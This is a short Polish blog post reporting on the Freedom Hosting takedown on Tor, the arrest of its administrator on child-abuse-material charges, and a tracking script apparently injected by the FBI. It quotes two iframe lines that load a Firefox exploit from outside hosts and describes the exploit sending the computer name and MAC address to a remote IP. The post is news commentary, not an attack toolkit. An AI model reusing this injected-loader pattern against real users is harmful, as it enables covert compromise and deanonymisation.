Niedawno zaczęły krążyć plotki o dziwnym skrypcie JS doklejanym przez FH. Poinformował o tym właściciel pewnej strony z pedofilią, której nazwy nie podam.

Niedawno w sieci (już tej normalnej) pojawiła się informacja o aresztowaniu administratora wyżej wymienionego hostingu. Był nim urodzony w USA 28 letni Irlandczyk (podwójne obywatelstwo) Eric Eoin Marques. Był również dyrektorem serwerowni, co pomogło mu w zdobyciu doświadczenia. FBI postawiło mu 4 zarzuty na łączną karę 30 lat więzienia i chce ekstradycji do USA. Nazwali go największym dostawcą dziecięcej pornografii na Ziemi. Przez jego konto przepływały duże kwoty, które trafiały do Rumuni. Podobno pieniądze trafiały do jego dziewczyny i na biznes kolegi. Szukał również informacji o zdobyciu wizy do Rosji (czyżby chciał bawić się w Snowdena?) co wykorzystano na jego niekorzyść. Rozprawa odbędzie się w czwartek.

Padły wszystkie serwisy działające na FH np. poczta TORmail. Poniżej screen wykonany prawdopodobnie przez serwis niebezpiecznik.pl z włączonym JavaScript. Ja nie miałem odwagi tam wejść.

Nie wiadomo jak FBI namierzyło Marquesa.

Sam podejrzany skrypt został dodany prawdopodobnie przez FBI. Pojawiły się 2 warianty kodu skryptu:

Pierwszy

iframe.src = "http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0"

Drugi

iframe.src = "http://65.222.202.53/?requestID=eb5f2c80-fc81-11e2-b778-0800200c9a66"

Kod wczytuje exploit na Firefoxa z zewnętrznego serwera. Najpierw sprawdzana jest wersja przeglądarki. Exploit działa tylko na 17 (na niej jest TOR). Exploit wysyła na adres 65.222.202.54 nazwę komputera oraz adres MAC karty sieciowej co umożliwia identyfikację użytkownika!!! W ten sposób FBI może namierzyć prawie każdego. Zespół Mozilli potwierdził że wykorzystano błąd, który jest znany publicznie od 25 Czerwca.

Po zamknięciu FH znikła połowa sieci TOR.

Co dalej? Czy będą dalsze aresztowania?

Zobaczymy.

Update: adres IP 65.222.202.53 pochodzi prawdopodobnie z USA, a konkretniej z Waszyngtonu co potwierdza teorie o ataku FBI.